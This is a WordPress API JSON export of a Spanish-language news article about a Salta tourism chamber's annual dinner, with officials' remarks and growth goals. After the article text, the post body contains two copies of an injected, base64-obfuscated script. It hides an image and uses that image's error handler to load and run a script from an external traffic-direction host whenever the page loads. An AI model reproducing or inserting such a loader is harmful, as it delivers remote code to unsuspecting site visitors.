{"id":1918,"date":"2022-12-08T19:47:15","date_gmt":"2022-12-08T22:47:15","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1918"},"modified":"2025-08-14T00:28:24","modified_gmt":"2025-08-14T03:28:24","slug":"el-sector-turistico-celebro-un-ano-de-crecimiento-de-la-actividad","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1918","title":{"rendered":"El sector tur\u00edstico celebr\u00f3 un a\u00f1o de crecimiento de la actividad"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#684e06\"><em>La C\u00e1mara de Turismo de Salta realiz\u00f3 su cena anual con la presencia de todo el sector privado y el sector p\u00fablico ratificando un trabajo conjunto del cual Salta es modelo en el pa\u00eds.<\/em><\/h4>\n\n\n\n<p>El Centro de Convenciones Salta fue el lugar elegido por el sector tur\u00edstico para celebrar su cena anual de camarader\u00eda donde convergieron autoridades provinciales, referentes nacionales de la actividad, municipales y 400 emprendedores tur\u00edsticos de toda la provincia que ratificaron un camino conjunto en pos del crecimiento de la actividad.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5169-el-sector-turistico-celebro-un-anio-de-crecimiento-de-la-actividad.jpg\" alt=\"\" width=\"350\" height=\"229\"\/><\/figure><\/div>\n\n\n<p>El ministro de Turismo y Deportes Mario Pe\u00f1a acompa\u00f1\u00f3 al presidente de la C\u00e1mara de Turismo de Salta Gustavo Di M\u00e9cola y a los titulares de c\u00e1maras asociadas en el cierre de un a\u00f1o en el cual Salta ratific\u00f3 su presencia como uno de los principales destinos del pa\u00eds.<br><br>Tambi\u00e9n estuvieron presentes el presidente del Foro de Intendentes Daniel Moreno y la intendenta de la ciudad de Salta, Bettina Romero.<\/p>\n\n\n\n<p>Se destac\u00f3 la presencia de referentes nacionales del sector privado: Federaci\u00f3n de C\u00e1maras de Turismo de la Argentina, su presidente H\u00e9ctor Vi\u00f1uales; Federaci\u00f3n Hotelera Gastron\u00f3mica de Argentina, su presidente Fernando Debots y vicepresidente Rafael Miranda; de la Federaci\u00f3n &nbsp; Argentina de Asociaciones de Empresas de Viajes y Turismo, Vicepresidente Exequiel Barberis.<\/p>\n\n\n\n<p>\u201cEn Salta tenemos un rumbo con una mirada federal marcada por el gobernador Gustavo S\u00e1enz que se plasma en el plan Liderar donde confluyen las visiones de todas las regiones tur\u00edsticas cuyo objetivo central es elevar la calidad de vida de los salte\u00f1os a trav\u00e9s del turismo, ser referentes regionales y generar 20 mil puestos de trabajo\u201d, sostuvo el ministro Pe\u00f1a agradeciendo a los emprendedores de toda la provincia que \u201capuestan d\u00eda a d\u00eda a la actividad con un 40 por ciento m\u00e1s de prestadores\u201d.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5170-el-sector-turistico-celebro-un-anio-de-crecimiento-de-la-actividad.jpg\" alt=\"\" width=\"385\" height=\"256\"\/><\/figure><\/div>\n\n\n<p>Por otra parte, se\u00f1al\u00f3 que el objetivo a cinco a\u00f1os es alcanzar los 3 millones de turistas por a\u00f1o. Anticip\u00f3 que este a\u00f1o se recuperar\u00e1n niveles de arribos previos a la pandemia porque Salta fue uno de los destinos m\u00e1s elegidos del pa\u00eds.<\/p>\n\n\n\n<p>Por otra parte record\u00f3 que el jueves 15 el Ministerio de Turismo y Deportes dar\u00e1 a conocer el Anuario 2022, no obstante, adelant\u00f3 que los indicadores permiten visualizar un crecimiento de la industria tur\u00edstica. Destac\u00f3 en este sentido, la recuperaci\u00f3n de un gran porcentaje del turismo internacional.<\/p>\n\n\n\n<p>El presidente de la C\u00e1mara de Turismo, Gustavo Di M\u00e9cola, puso en valor el crecimiento del sector privado a trav\u00e9s de c\u00e1maras del interior que se suman al trabajo, destacando la asociaci\u00f3n del sector privado de Iruya y de Campo Quijano en las \u00faltimas semanas. En el mismo proceso se encuentra la de Cafayate. \u201cAgradezco a los socios por movilizar un sector que es clave en la actividad econ\u00f3mica de Salta\u201d, dijo el empresario.<\/p>\n\n\n\n<p>Estuvieron presentes intendentes de varios puntos de la provincia, la secretaria de Turismo Nadia Loza, la presidenta del Inprotur Salta Manuela Arancibia, el presidente del Salta Convention Bureau Daniel Astorga, la presidenta de la Asociaci\u00f3n de Hoteles de Turismo Mariana Farjat, el presidente de la C\u00e1mara Hotelera Gastron\u00f3mica de Salta Juan Lucero y el presidente de Adopta, Federico Ochoa.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La C\u00e1mara de Turismo de Salta realiz\u00f3 su cena anual con la presencia de todo el sector privado y el sector p\u00fablico ratificando un trabajo conjunto del cual Salta es modelo en el pa\u00eds. El Centro de Convenciones Salta fue el lugar elegido por el sector tur\u00edstico para celebrar su cena anual de camarader\u00eda donde [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1919,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-1918","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1918"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1918"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1918\/revisions"}],"predecessor-version":[{"id":7249,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1918\/revisions\/7249"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1919"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1918"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1918"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1918"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}